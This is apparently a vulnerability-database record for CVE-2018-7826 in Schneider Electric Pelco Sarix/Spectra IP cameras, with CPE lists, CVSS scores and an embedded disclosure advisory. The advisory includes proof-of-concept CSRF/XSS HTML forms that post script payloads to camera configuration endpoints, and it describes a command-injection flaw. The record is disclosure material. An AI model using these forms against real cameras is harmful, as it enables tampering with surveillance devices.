{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1ep_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1ep:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1ei_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1ei:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1es_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1es:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1ep_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1ep:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1ei_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1ei:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1es_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1es:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1ep_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1ep:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1vi_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1vi:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1vs_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1vs:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1vp_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1vp:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1vi_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1vi:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1vs_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1vs:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1vp_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1vp:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1vi_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1vi:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1vs_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1vs:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1vp_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1vp:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1vi_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1vi:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1vs_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1vs:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1vp_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1vp:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1vi_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1vi:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1vs_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1vs:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1vp_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1vp:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ixes1_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ixes1:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ixe11_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ixe11:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ixe21_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ixe21:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ixe31_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ixe31:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7826"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Vulnerability discovered by Gjoko Krstic",
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
}
],
"trust": 0.2
},
"cve": "CVE-2018-7826",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-7826",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2017-23302",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2019-16259",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-7826",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-7826",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2017-23302",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2019-16259",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201905-909",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "ZSL",
"id": "ZSL-2017-5417",
"trust": 0.1,
"value": "(4/5)"
},
{
"author": "ZSL",
"id": "ZSL-2017-5415",
"trust": 0.1,
"value": "(3/5)"
}
]
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16259"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015519"
},
{
"db": "NVD",
"id": "CVE-2018-7826"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-909"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A Command Injection vulnerability exists in the web-based GUI of the 1st Gen Pelco Sarix Enhanced Camera that could allow a remote attacker to execute arbitrary commands. Pelco Sarix Enhanced and Spectra Enhanced PTZ Camera Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. PelcoSarix/SpectraCameras is a camera from Pelco. SchneiderElectric1stGenPelcoSarixEnhancedCamera is a series of fixed IP cameras from Schneider Electric, France. The vulnerability stems from the fact that external input data constructs executable commands, and the network system or product does not properly filter the special elements. An attacker could exploit the vulnerability to execute an illegal command. Pelco offers the broadest selection of IP cameras designedfor security surveillance in a wide variety of commercial and industrialsettings. The POST parameter \u0027enable_leds\u0027 locatedin the update() function called via the GeneralSetupController.phpscript is not properly sanitised before being used in writeLedConfig()function to enable led state to on or off. A remote attacker canexploit this issue and execute arbitrary system commands grantingher system access with root privileges using a specially craftedrequest and escape sequence to system shell.Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknownMontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)Lighttpd/1.4.28PHP/5.3.0. \nSchneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities\n\n\nVendor: Schneider Electric SE\nProduct web page: https://www.pelco.com\nAffected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0)\n Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0)\n Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722)\n Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503)\n Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)\n\nSummary: Pelco offers the broadest selection of IP cameras designed\nfor security surveillance in a wide variety of commercial and industrial\nsettings. From our industry-leading fixed and high-speed IP cameras to\npanoramic, thermal imaging, explosionproof and more, we offer a camera\nfor any environment, any lighting condition and any application. \nWhen nothing but the best will do. SarixaC/ Enhanced Range cameras\nprovide the most robust feature-set for your mission-critical applications. \nWith SureVisionaC/ 3.0, Sarix Enhanced delivers the best possible image\nin difficult lighting conditions such as a combination of bright areas,\nshaded areas, and intense light. Designed with superior reliability,\nfault tolerance, and processing speed, these rugged fixed IP cameras\nensure you always get the video that you need. \n\nDesc: Pelco cameras suffer from multiple dom-based, stored and reflected\nXSS vulnerabilities when input passed via several parameters to several\nscripts is not properly sanitized before being returned to the user. \n\nTested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown\n MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)\n Lighttpd/1.4.28\n PHP/5.3.0\n\n\nVulnerability discovered by Gjoko \u0027LiquidWorm\u0027 Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2017-5415\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php\n\n\n07.04.2017\n\n--\n\n\nCSRF/XSS on username parameter:\n-------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/dot1x/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"dot1x\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"protocol\" value=\"EAP\u0026#45;TLS\" /\u003e\n \u003cinput type=\"hidden\" name=\"inner\u0026#95;auth\" value=\"CHAP\" /\u003e\n \u003cinput type=\"hidden\" name=\"username\" value=\u0027\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"password\" value=\"blah\" /\u003e\n \u003cinput type=\"hidden\" name=\"anonymous\u0026#95;id\" value=\"\u0026#13;\" /\u003e\n \u003cinput type=\"hidden\" name=\"ca\u0026#95;certificate\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"client\u0026#95;certificate\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"private\u0026#95;key\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"private\u0026#95;key\u0026#95;password\" value=\"test\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:\n-------------------------------------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/general/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"hostname\" value=\u0027\"\u003e\u003cscript\u003ealert(2)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"http\u0026#95;port\" value=\u0027\"\u003e\u003cscript\u003ealert(3)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"rtsp\u0026#95;port\" value=\u0027\"\u003e\u003cscript\u003ealert(4)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"dhcp\" value=\"off\" /\u003e\n \u003cinput type=\"hidden\" name=\"ip\u0026#95;address\" value=\u0027\"\u003e\u003cscript\u003ealert(5)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"subnet\u0026#95;mask\" value=\u0027\"\u003e\u003cscript\u003ealert(6)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"gateway\" value=\u0027\"\u003e\u003cscript\u003ealert(7)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"nameservers\" value=\u0027\"\u003e\u003cscript\u003ealert(8)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on version parameter:\n------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/snmp/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"version\" value=\u0027\";alert(9)//\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;community\u0026#95;string\" value=\"public\" /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;receiver\u0026#95;address\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;trap\u0026#95;community\u0026#95;string\" value=\"trapbratce\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:\n----------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/system/general/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"device\u0026#95;name\" value=\u0027ZSL\"\u003e\u003cscript\u003ealert(10)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;leds\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"smtp\u0026#95;server\" value=\u0027\"\u003e\u003cscript\u003ealert(11)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ntp\u0026#95;server\u0026#95;from\u0026#95;dhcp\" value=\"false\" /\u003e\n \u003cinput type=\"hidden\" name=\"ntp\u0026#95;server\" value=\"\u0027;alert(12)//\u0027\" /\u003e\n \u003cinput type=\"hidden\" name=\"region\" value=\"Macedonia\u0027;alert(13)//\" /\u003e\n \u003cinput type=\"hidden\" name=\"zone\" value=\"Kumanovo\u0027;alert(14)//\" /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;time\u0026#95;overlay\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;name\u0026#95;overlay\" value=\"off\" /\u003e\n \u003cinput type=\"hidden\" name=\"position\" value=\"topright\" /\u003e\n \u003cinput type=\"hidden\" name=\"date\u0026#95;format\" value=\"0\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nXSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:\n--------------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/events/handlers/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"id\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;sentinel\" value=\"relay\u0026#95;sentinel\" /\u003e\n \u003cinput type=\"hidden\" name=\"name\" value=\u0027\"\u003e\u003cscript\u003ealert(15)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"type\" value=\"Ftp\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;to\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;from\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;subject\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;message\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"dest\u0026#95;name\" value=\"IMG\u0026#37;m\u0026#37;d\u0026#37;Y\u0026#37;H\u0026#37;M\u0026#37;S\u0026#46;jpg\" /\u003e\n \u003cinput type=\"hidden\" name=\"limit\u0026#95;size\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"limit\u0026#95;size\u0026#95;scale\" value=\"K\" /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;server\" value=\u0027\"\u003e\u003cscript\u003ealert(16)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;username\" value=\u0027\"\u003e\u003cscript\u003ealert(17)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" 